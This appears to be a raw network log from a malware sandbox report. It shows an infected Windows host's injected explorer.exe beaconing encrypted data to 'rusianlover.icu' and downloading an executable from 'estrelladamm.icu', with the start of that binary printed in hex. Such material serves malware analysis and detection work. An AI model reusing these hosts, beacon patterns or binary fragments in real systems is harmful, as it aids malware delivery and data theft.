                                        Data Ascii: zydchgf=6ed8d9327760502a11a1315a2c&xuxux=40658545&bcjkrstab=3F67D7CC856695B9A2BD120D4D17F8920B606C48C244F3064C15589691AB6418E722A503A74E50C5D40CD646F3226254872F6354207A10BB5F33D39ED6BF5CAE39B2915A474683B6D8B92505903077BCB198DE2F9DA8E2CDB591D0381D08683AD3AB3FF009713F5F16DBDED739F9C00801E90D4B43B9CAEBEDC2B1A53B144FBDCC713F20874A3F56B30C754099D9692FE95D27710A958BABB764D29E7CFCD29753236D1B50E4D1B483E5F0E667574202D1248F25FC4089373A275002A2D5B7D2618ECCE4D65AF18B0AD19C25F9E3012CFFB00D184806FAA44A027DFEDD281351F5A18C37899524615C167C2CD1C333C8919F050C6DE8D4AF405A3AE5EBAD1915CD5EED0B5AFFD6A4368762508F31E4FC0CF6B8A0828346DD9F434C06A39237D5C5E1FE14
                                        Mar 10, 2021 11:43:46.642538071 CET10184INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:52 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a d4 0a 84 32 d2 78 15 76 87 21 ca ba 2c 1b fb 49 e4 0c 49 5a f3 a6 e9 21 54 97 99 d7 15 77 d4 c3 63 a7 ba f7 95 be 11 01 c0 cc 12 bd 6e 97 63 52 94 15 1c fe 16 f9 43 d6 e9 d9 7c 50 0d 1b e1 86 eb 76 55 7a 89 80 c5 d6 7b 94 15 b4 03 d4 47 3e 19 4f d4 d4 8b 36 06 e9 ab 1b cf eb 74 46 a0 ad a6 29 14 55 c9 af e7 58 4e 09 f7 a5 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d2xv!,IIZ!TwcncRC|PvUz{G>O6tF)UXN0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        29192.168.2.549762212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:49.404409885 CET10186OUTPOST /forum/logout.php?id=9557666 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 672
                                        Cache-Control: no-cache
                                        Data Raw: 66 71 62 67 72 3d 41 30 44 36 39 39 38 35 42 44 30 44 39 45 36 44 32 32 43 45 32 43 35 42 46 39 34 42 46 46 41 31 45 36 36 37 46 33 37 46 34 44 37 37 34 41 38 46 38 36 44 35 43 46 26 64 6d 76 79 68 71 7a 63 6c 3d 32 30 30 30 32 34 37 35 26 68 75 68 6f 62 6f 62 3d 62 62 65 37 65 39 66 65 35 38 39 31 30 35 33 30 32 62 34 63 31 39 38 33 33 37 64 37 65 30 64 31 37 63 34 38 39 31 62 34 37 64 61 30 32 38 37 61 30 35 35 38 30 39 35 65 30 38 64 62 65 36 32 36 65 66 31 35 33 37 39 62 39 35 36 30 62 38 32 37 34 30 65 38 39 33 66 31 66 35 66 63 61 39 65 30 64 34 65 64 30 63 62 33 33 31 61 61 62 61 38 37 66 31 63 65 66 35 34 34 64 66 64 32 61 31 62 35 39 61 36 39 63 62 66 61 35 38 39 32 31 33 61 31 31 63 36 31 39 38 36 65 39 34 31 34 32 31 35 33 63 63 39 39 66 63 61 35 64 62 34 34 61 66 34 38 61 65 66 37 65 30 65 30 36 65 34 34 34 37 61 33 33 31 61 37 62 32 30 33 61 38 62 32 33 61 66 35 37 61 35 62 38 38 34 31 62 32 64 63 62 38 37 31 64 37 37 64 65 61 33 61 65 39 34 34 65 66 66 65 39 64 33 32 39 31 32 32 35 63 32 34 39 32 38 35 61 61 33 31 66 62 35 39 66 39 63 39 36 33 36 37 36 37 39 36 33 37 64 65 34 62 39 66 66 30 63 62 34 37 35 66 33 62 35 64 37 36 65 37 61 35 66 31 34 35 64 36 31 30 64 61 61 63 61 35 38 63 37 32 31 36 32 32 33 61 34 64 35 35 64 36 61 36 36 32 38 38 63 34 35 31 61 61 39 37 39 62 37 65 36 61 36 32 36 35 34 39 64 64 31 65 63 62 37 32 34 65 36 62 66 33 66 31 63 31 32 61 38 62 38 34 64 32 66 32 39 62 31 32 31 35 35 61 30 62 38 33 31 32 37 32 31 63 61 61 39 35 37 36 30 66 36 61 32 33 32 61 32 32 30 32 33 37 36 62 63 37 63 65 33 64 66 63 61 63 32 33 64 64 62 35 35 31 62 33 66 33 34 31 64 30 30 66 33 30 65 66 66 65 39 62 36 36 61 35 61 66 31 33 38 35 37 64 65 33 62 37 39 61 37 37 34 30 32 63 34 38 66 35 65 63 35 61 31 61 31 30 31 63 37 32 39 63 61 63 39 30 61 33 34 36 38 30 34 39 63 61 64 39 35 65 38 35 38 37 35 32 33 32 65 64 34 35 34 35 33 32 65 32 31 30 36 33 65 31 66 64 34 32 33 63 66 33 36 32 39 33 35 39 64 30 65 38 65 65 37 32 66 35 31 32 38 62 65 37 34 61 63 33 62 39 35 35
                                        Data Ascii: fqbgr=A0D69985BD0D9E6D22CE2C5BF94BFFA1E667F37F4D774A8F86D5CF&dmvyhqzcl=20002475&huhobob=bbe7e9fe589105302b4c198337d7e0d17c4891b47da0287a0558095e08dbe626ef15379b9560b82740e893f1f5fca9e0d4ed0cb331aaba87f1cef544dfd2a1b59a69cbfa589213a11c61986e94142153cc99fca5db44af48aef7e0e06e4447a331a7b203a8b23af57a5b8841b2dcb871d77dea3ae944effe9d3291225c249285aa31fb59f9c96367679637de4b9ff0cb475f3b5d76e7a5f145d610daaca58c7216223a4d55d6a66288c451aa979b7e6a626549dd1ecb724e6bf3f1c12a8b84d2f29b12155a0b8312721caa95760f6a232a2202376bc7ce3dfcac23ddb551b3f341d00f30effe9b66a5af13857de3b79a77402c48f5ec5a1a101c729cac90a3468049cad95e85875232ed454532e21063e1fd423cf3629359d0e8ee72f5128be74ac3b955
                                        Mar 10, 2021 11:43:49.483335018 CET10186INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 41 8f 16 19 82 1b 9c 41 c6 5a af 02 7f 6d 7d 8a 98 f5 1d 9d d9 66 7f ad 12 07 38 99 6b af dd eb aa 3c ca 8c de c9 be 7f 9c 78 b1 41 5d 97 a5 36 f3 99 bf 99 0f b8 a9 d7 f0 1d ce ea a5 2d b9 13 9e a6 07 91 4c de 6c 18 80 87 81 aa 27 5f ab d8 33 b3 b7 04 9d 8b ea 6d f7 99 9c 45 70 a7 22 0b 79 cd 04 45 48 30 90 83 c6 92 b8 8f 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dAAZm}f8k<xA]6-Ll'_3mEp"yEH00


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.5497198.210.47.21480C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:34.206296921 CET1224OUTGET /old/GetDataAVK.exe HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: estrelladamm.icu
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:42:34.481314898 CET1226INHTTP/1.1 200 OK
                                        Date: Wed, 10 Mar 2021 10:42:34 GMT
                                        Server: Apache
                                        Last-Modified: Wed, 10 Mar 2021 05:36:15 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 680448
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee 58 48 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 58 0a 00 00 08 00 00 00 00 00 00 ce 76 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 76 0a 00 57 00 00 00 00 80 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 0c 00 00 00 c4 75 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 56 0a 00 00 20 00 00 00 58 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 80 0a 00 00 06 00 00 00 5a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0a 00 00 02 00 00 00 60 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 76 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 18 a4 09 00 ac d1 00 00 03 00 00 00 c1 01 00 06 a8 95 00 00 70 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 e1 01 00 06 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 4a 02 04 28 03 00 00 0a 00 00 02 03 28 03 00 00 06 00 2a 00 13 30 02 00 0d 00 00 00 01 00 00 11 00 02 03 73 04 00 00 06 0a 2b 00 06 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 36 02 03 04 14 14 28 09 00 00 06 00 00 2a 13 30 04 00 4c 00 00 00 02 00 00 11 73 0d 00 00 06 0a 06 0e 04 7d 03 00 00 04 02 03 04 28 04 00 00 06 00 00 05 2c 0b 06 7b 03 00 00 04 14 fe 03 2b 01 16 0b 07 2c 20 00 02 05 6f 95 00 00 06 06 fe 06 0e 00 00 06 73 04 00 00 0a 28 01 00 00 2b 28 07 00 00 06 00 00 2a 13 30 02 00 0d 00 00 00 03 00 00 11 00 02 03 73 08 00 00 06 0a 2b 00 06 2a 00 00 00 13 30 04 00 0f 00 00 00 03 00 00 11 00 02 03 04 05 73 09 00 00 06 0a 2b 00 06 2a 00 13 30 04 00 19 00 00 00 03 00 00 11 00 02 6f 02 00 00 06 02 6f 06 00 00 0a 03 04 73 09 00 00 06 0a 2b 00 06 2a 22 02 28 07 00 00 0a 00 2a 6e 03 6f b5 00 00 06 2d 11 03 02 7b 03 00 00 04 6f bb 00 00 06 14 fe 01 2b 01 16 2a 1e 02 7b 1e 00 00 04 2a 22 02 03 7d 1e 00 00 04 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 20 00 00 04 2a 1e 02 7b 21 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 22 00 00 04 2a 22 02 03 7d 22 00 00 04 2a 1e 02 7b 23 00 00 04 2a 22 02 03 7d 23 00 00 04 2a 32 02 03 1c 04 28 1a 00 00 06 00 00 2a 13 30 04 00 c2 00 00 00 04 00 00 11 02 14 7d 18 00 00 04 02 14 7d 19 00 00 04 02 16 6a 7d 1b 00 00 04 02 16 7d 1c 00 00 04 02 73 09 00 00 0a 7d 1d 00 00 04 02 28 07 00 00 0a 00 00 03 28 0a 00 00 0a 0d 09 2c 10 72 01 00 00 70 72 25 00 00 70 73 0b 00 00 0a 7a 02 03 28 12 00 00 06 00 02 28 11 00 00 06 28 1d 00 00 06 0b 07 12 00 04 7e 0c 00 00 0a 28 2e 01 00 06 0c 02 06 28 10 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELXH`0Xv @ @tvWu H.textV X `.rsrcZ@@.reloc`@BvHp(*{*"}*J((*0s+*{*"}*6(*0Ls}(,{+, os(+(*0s+*0s+*0oos+*"(*no-{o+*{*"}*{ *"} *{!*"}!*{"*"}"*{#*"}#*2(*0}}j}}s}((,rpr%psz(((~(.(


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        30192.168.2.549763212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:52.245745897 CET10188OUTPOST /forum/logout.php?id=2442663 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 659
                                        Cache-Control: no-cache
                                        Data Raw: 6d 79 6b 77 69 75 67 73 3d 37 34 38 34 37 38 36 36 38 64 34 35 66 66 39 37 38 38 38 38 66 61 61 30 38 34 34 62 63 34 39 65 34 34 62 38 63 38 30 35 64 39 32 63 26 6b 75 65 6f 79 69 3d 31 35 32 36 34 30 36 32 26 6f 63 71 65 3d 33 64 36 34 36 38 34 62 35 66 65 34 66 66 65 65 31 64 61 61 62 36 63 33 63 36 66 39 37 35 65 37 32 61 36 32 31 39 36 34 39 63 34 35 66 33 61 39 39 34 32 63 37 39 34 64 32 32 63 63 35 36 65 33 36 66 61 34 33 61 65 33 32 63 37 36 39 61 32 31 37 39 63 35 33 37 61 31 39 63 63 36 38 62 34 33 64 31 64 38 30 64 63 34 38 33 33 61 65 33 62 32 31 39 39 30 34 39 66 39 31 62 38 66 38 35 65 35 62 35 39 30 34 31 31 63 39 31 62 63 61 62 39 64 38 34 30 63 37 31 34 36 37 66 35 65 66 31 30 39 38 33 39 30 31 33 35 61 63 62 36 31 66 37 31 66 61 36 39 32 62 62 36 37 63 38 62 62 66 33 63 63 37 32 63 37 65 38 37 66 61 64 39 64 36 35 65 34 35 39 36 66 62 63 37 62 38 64 38 37 32 63 66 38 30 63 66 66 63 38 31 65 36 32 65 65 35 35 35 33 66 37 37 61 38 61 62 32 32 33 31 63 35 39 64 37 35 38 39 35 62 31 36 61 31 65 31 64 34 34 38 31 37 36 31 65 63 64 34 35 34 39 37 31 37 61 64 34 62 39 61 36 36 65 31 65 31 37 64 61 30 62 30 65 65 30 37 34 30 65 33 61 38 38 65 30 33 34 32 31 30 61 63 62 30 64 31 33 64 30 36 35 62 62 61 39 35 37 65 37 39 66 37 34 61 63 62 35 38 37 63 63 37 33 32 32 66 65 36 62 62 30 36 33 31 34 38 32 61 32 39 61 34 34 36 61 34 36 65 31 33 64 32 61 66 30 61 38 32 64 31 32 39 63 31 66 35 64 31 34 32 62 61 61 64 38 38 64 31 30 34 65 66 66 66 34 39 35 65 39 39 65 62 38 33 65 39 33 61 35 37 31 31 61 34 38 65 38 65 62 38 65 66 36 34 35 66 65 37 34 63 37 36 30 36 65 31 61 34 65 34 36 35 35 37 36 63 31 37 32 36 30 35 63 31 31 35 62 38 34 62 39 66 65 39 34 63 64 35 32 65 33 64 33 31 63 36 34 36 36 64 33 64 63 39 30 38 30 36 33 38 66 66 62 30 33 66 30 33 66 66 63 64 66 33 65 37 35 62 35 65 62 30 62 30 30 30 32 37 64 63 30 39 32 34 39 33 65 63 62 66 65 39 61 65 34 62 62 39 37 37 38 64 35 32 35 30 61 61 66 63 36 30 37 39 35 66 31 31 30 31 30 32 39
                                        Data Ascii: mykwiugs=748478668d45ff978888faa0844bc49e44b8c805d92c&kueoyi=15264062&ocqe=3d64684b5fe4ffee1daab6c3c6f975e72a6219649c45f3a9942c794d22cc56e36fa43ae32c769a2179c537a19cc68b43d1d80dc4833ae3b2199049f91b8f85e5b590411c91bcab9d840c71467f5ef1098390135acb61f71fa692bb67c8bbf3cc72c7e87fad9d65e4596fbc7b8d872cf80cffc81e62ee5553f77a8ab2231c59d75895b16a1e1d4481761ecd4549717ad4b9a66e1e17da0b0ee0740e3a88e034210acb0d13d065bba957e79f74acb587cc7322fe6bb0631482a29a446a46e13d2af0a82d129c1f5d142baad88d104efff495e99eb83e93a5711a48e8eb8ef645fe74c7606e1a4e465576c172605c115b84b9fe94cd52e3d31c6466d3dc9080638ffb03f03ffcdf3e75b5eb0b00027dc092493ecbfe9ae4bb9778d5250aafc60795f1101029
                                        Mar 10, 2021 11:43:52.322666883 CET10188INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a db ab 96 43 cd 27 ee 46 10 6a 6a 71 83 d9 64 74 63 ac f3 7d 87 d6 d0 58 3e c4 87 63 47 73 47 91 70 46 6f e7 ae d5 41 d5 93 f3 67 9f a2 28 5f 72 88 f0 b8 3f f0 ed ef 44 03 a7 9d d6 28 23 b2 9d 8a 75 14 02 1d cf 2a 7c 9d d8 df f7 39 8d 1c fe ca ef 09 c5 61 3d 24 d4 ff a4 7a 98 f2 e8 25 2d f2 39 39 5c eb fa f8 85 ce 00 d3 5f 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dC'Fjjqdtc}X>cGsGpFoAg(_r?D(#u*|9a=$z%-99\_0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        31192.168.2.549764212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:55.078284025 CET10190OUTPOST /forum/logout.php?id=7086675 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 633
                                        Cache-Control: no-cache
                                        Data Raw: 69 77 65 73 67 6f 63 71 3d 38 35 32 38 31 39 33 34 26 6b 61 6b 61 3d 37 33 65 62 32 63 64 65 62 62 63 63 33 36 62 62 30 37 26 6d 65 71 69 61 6d 3d 33 33 31 65 33 65 30 33 37 39 32 35 35 34 31 31 65 31 35 66 66 37 32 30 36 63 66 30 31 37 32 65 39 36 33 39 36 32 37 30 32 35 35 38 36 39 39 34 35 38 33 36 35 31 61 31 30 36 64 31 66 37 61 65 63 38 63 32 61 37 63 34 63 30 38 38 34 35 61 35 37 38 38 33 65 34 31 30 30 32 66 65 61 31 34 35 31 62 36 35 31 62 36 35 31 31 63 35 33 65 66 34 63 61 61 62 33 65 35 33 35 62 34 32 66 31 38 63 37 31 33 65 64 63 36 63 66 62 63 37 64 66 34 65 65 34 64 34 64 34 30 31 64 37 30 35 30 32 31 62 30 61 30 66 31 36 34 66 32 32 62 63 37 35 62 31 37 34 36 64 30 35 35 66 61 63 30 61 38 61 65 61 38 39 63 64 36 36 63 64 36 66 33 32 63 37 38 31 65 65 30 61 34 37 64 36 33 31 65 65 36 35 65 33 64 30 64 39 33 64 31 38 33 30 64 32 61 61 35 34 34 63 61 31 62 64 38 64 64 38 65 63 31 35 34 62 66 36 33 31 63 34 33 32 61 35 34 34 33 30 39 31 35 31 38 35 39 35 64 62 30 30 38 61 38 33 61 64 36 63 63 37 61 61 32 38 31 34 65 64 63 62 32 37 39 36 30 62 61 33 31 36 63 37 63 31 35 36 34 36 39 38 63 63 64 66 63 32 38 37 35 31 35 38 65 64 30 36 66 61 37 39 61 63 37 35 30 66 38 38 32 38 66 32 33 31 66 33 66 35 31 33 64 37 64 33 38 34 35 39 36 35 34 32 65 37 64 65 33 65 61 62 66 61 62 65 66 63 30 38 33 61 35 63 61 39 66 30 35 36 30 33 35 36 63 61 33 61 61 32 32 39 66 30 33 65 31 30 37 32 34 37 34 61 37 61 33 64 61 39 39 37 64 31 63 66 66 62 64 31 35 34 62 39 63 31 38 39 30 35 64 31 37 63 62 36 30 65 64 35 35 39 33 30 34 64 34 38 38 30 32 37 35 63 34 36 31 33 36 37 38 64 34 39 34 61 61 61 38 32 37 65 62 31 63 35 66 31 33 34 62 36 38 32 38 35 61 61 61 63 36 35 31 37 38 64 39 36 62 63 64 35 39 36 61 38 32 34 31 62 38 32 62 36 36 36 36 33 61 35 33 39 30 66 31 37 32 65 32 62 34 32 38 64 30 61 65 39 35 36 35 38 32 30 63 33 64 37 34 64 32 38 63 37 30 38 63 36 63 39 34 66 61 31
                                        Data Ascii: iwesgocq=85281934&kaka=73eb2cdebbcc36bb07&meqiam=331e3e0379255411e15ff7206cf0172e9639627025586994583651a106d1f7aec8c2a7c4c08845a57883e41002fea1451b651b6511c53ef4caab3e535b42f18c713edc6cfbc7df4ee4d4d401d705021b0a0f164f22bc75b1746d055fac0a8aea89cd66cd6f32c781ee0a47d631ee65e3d0d93d1830d2aa544ca1bd8dd8ec154bf631c432a5443091518595db008a83ad6cc7aa2814edcb27960ba316c7c1564698ccdfc2875158ed06fa79ac750f8828f231f3f513d7d384596542e7de3eabfabefc083a5ca9f0560356ca3aa229f03e1072474a7a3da997d1cffbd154b9c18905d17cb60ed559304d4880275c4613678d494aaa827eb1c5f134b68285aaac65178d96bcd596a8241b82b66663a5390f172e2b428d0ae9565820c3d74d28c708c6c94fa1
                                        Mar 10, 2021 11:43:55.147188902 CET10190INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:44:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 00 c5 07 3a 89 25 cb 45 b1 4c 07 c5 58 18 be 27 15 c8 3b 5f 14 d6 97 2e 84 39 ed 0e 16 6e a2 9d 8d b1 a5 71 40 3a 33 3b 55 87 83 c9 d4 5a 95 c3 37 d0 3b 03 22 60 e0 c3 46 6b 71 00 6d 11 a3 71 48 f1 d3 be 7b 2f ce 5f ad 3a b0 e2 d5 f1 a0 54 84 7c 8a bc 14 0d 60 b3 2f 20 09 f7 44 8d 4e 98 17 3a 37 4a b4 3b be 17 b0 37 d5 01 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d:%ELX';_.9nq@:3;UZ7;"`FkqmqH{/_:T|`/ DN:7J;70


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.549720212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:36.555608034 CET1938OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 633
                                        Cache-Control: no-cache
                                        Data Raw: 6c 63 6e 65 70 67 78 69 7a 3d 35 36 30 37 35 32 31 26 6e 67 74 6d 7a 3d 37 61 39 31 62 31 65 34 30 65 30 35 65 37 34 30 26 70 6b 7a 75 6a 65 7a 3d 30 39 39 46 35 36 30 44 33 35 41 43 34 38 44 46 34 46 36 42 39 44 46 38 44 38 45 45 33 44 30 38 45 42 41 44 45 34 41 36 42 45 41 45 37 32 32 38 39 37 37 32 30 45 33 43 30 38 46 31 36 34 31 38 37 43 42 38 44 34 39 35 42 34 43 31 32 34 32 34 35 37 30 45 34 33 43 45 34 38 36 36 31 42 45 38 30 39 39 37 46 30 42 46 31 31 32 32 32 32 41 32 41 45 32 36 30 36 42 42 34 39 44 31 36 44 35 32 38 41 34 42 35 45 30 37 36 37 33 43 44 33 34 43 37 32 42 43 37 45 33 30 46 39 33 34 39 44 35 36 32 42 42 41 35 36 41 30 45 34 45 35 35 32 42 44 35 37 39 41 46 45 30 30 37 46 33 39 45 34 45 46 34 39 39 45 34 42 41 41 30 41 46 39 44 33 33 37 45 35 34 41 32 46 41 44 34 33 38 35 30 33 31 39 42 46 34 31 44 42 33 37 32 34 37 45 46 38 41 32 35 36 34 41 36 41 34 32 42 46 38 38 39 32 44 34 33 42 33 41 41 30 30 32 32 37 44 43 41 30 42 35 42 46 30 42 39 39 35 39 34 46 46 46 41 37 34 44 34 43 39 38 34 38 45 36 33 41 36 39 45 46 46 33 39 32 46 44 42 43 31 39 38 33 45 39 31 30 30 46 39 33 46 35 36 44 37 37 35 30 38 33 41 32 36 39 44 44 39 43 46 33 36 44 44 44 33 38 36 42 30 36 46 34 45 37 37 38 39 39 37 34 45 30 32 31 30 45 43 38 36 32 44 36 37 45 33 31 30 44 36 42 46 46 32 43 36 39 38 43 46 39 36 41 46 32 45 32 32 41 36 46 35 42 31 37 30 36 39 41 39 30 35 44 43 34 37 41 38 45 36 39 34 42 45 41 46 37 31 35 38 45 35 32 45 32 37 44 37 30 41 41 41 38 42 37 41 31 46 42 32 44 39 46 43 38 45 37 46 35 44 43 32 42 31 33 45 36 41 39 33 45 33 39 36 45 37 42 42 35 43 37 44 45 38 38 39 38 31 38 35 35 45 36 45 44 41 33 37 43 34 34 36 41 34 37 45 37 34 30 45 41 46 33 41 45 32 46 33 43 30 43 42 32 38 31 30 33 32 42 43 41 30 30 45 30 45 37 39 32 45 35 46 45 33 31 33 46 31 39 32 45 37 34 36 39 39 30 37 39 41 36 46 35 43 43 45 32 44 43 46 33 43 31 34 46 45 38 43 34 44 35 31 30
                                        Data Ascii: lcnepgxiz=5607521&ngtmz=7a91b1e40e05e740&pkzujez=099F560D35AC48DF4F6B9DF8D8EE3D08EBADE4A6BEAE722897720E3C08F164187CB8D495B4C12424570E43CE48661BE80997F0BF112222A2AE2606BB49D16D528A4B5E07673CD34C72BC7E30F9349D562BBA56A0E4E552BD579AFE007F39E4EF499E4BAA0AF9D337E54A2FAD43850319BF41DB37247EF8A2564A6A42BF8892D43B3AA00227DCA0B5BF0B99594FFFA74D4C9848E63A69EFF392FDBC1983E9100F93F56D775083A269DD9CF36DDD386B06F4E7789974E0210EC862D67E310D6BFF2C698CF96AF2E22A6F5B17069A905DC47A8E694BEAF7158E52E27D70AAA8B7A1FB2D9FC8E7F5DC2B13E6A93E396E7BB5C7DE88981855E6EDA37C446A47E740EAF3AE2F3C0CB281032BCA00E0E792E5FE313F192E74699079A6F5CCE2DCF3C14FE8C4D510
                                        Mar 10, 2021 11:42:36.624667883 CET1939INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a c9 b4 e9 0d a6 61 f5 53 a9 97 3c 8a d4 2e 04 dc fc 45 a4 e2 81 76 15 22 a5 7a f5 49 66 f8 91 7b 48 aa 4b 93 41 a3 6f f1 7e b7 80 d3 fc c3 a6 95 f8 73 bc 0c 00 51 23 ce a0 25 3b 37 a1 9d cc b5 63 e1 ea 1f 05 93 99 d0 2f 73 85 10 e1 58 ff 24 a3 1f ba 06 06 ea f3 a6 ed ee 89 9f b5 11 74 c0 21 ca 07 29 42 a9 f0 23 81 01 83 0f 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6daS<.Ev"zIf{HKAo~sQ#%;7c/sX$t!)B#0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.549722212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:39.489584923 CET1963OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 693
                                        Cache-Control: no-cache
                                        Data Raw: 6d 79 6b 77 6f 61 3d 64 62 37 62 63 32 62 38 65 62 31 64 39 64 35 64 39 33 39 64 65 62 65 35 33 34 35 31 37 64 34 61 65 36 34 38 36 63 37 66 34 61 34 35 31 64 32 35 39 30 34 35 63 32 39 38 34 34 32 31 36 32 61 61 38 33 61 37 66 36 30 63 34 65 32 64 34 65 26 6b 75 65 6f 3d 36 30 38 34 37 33 36 32 26 6f 63 71 65 79 6d 61 6f 3d 30 34 61 64 35 64 32 62 38 64 66 34 38 64 39 33 65 39 38 63 64 64 38 32 63 65 33 35 38 34 64 62 30 65 61 61 64 38 38 39 63 65 66 34 61 62 33 31 37 39 36 32 32 36 32 37 38 34 32 63 62 31 31 65 35 37 32 65 33 63 30 66 30 37 63 38 39 65 30 36 62 63 64 31 35 30 63 34 32 35 61 65 64 39 61 39 64 35 63 36 32 62 32 35 36 65 39 37 34 30 32 33 34 62 38 30 64 61 35 30 32 61 31 65 34 36 65 30 64 65 34 63 35 64 34 30 63 32 36 31 39 38 35 32 35 35 64 39 33 39 39 65 62 66 35 39 36 38 63 63 35 34 64 39 62 30 35 37 35 65 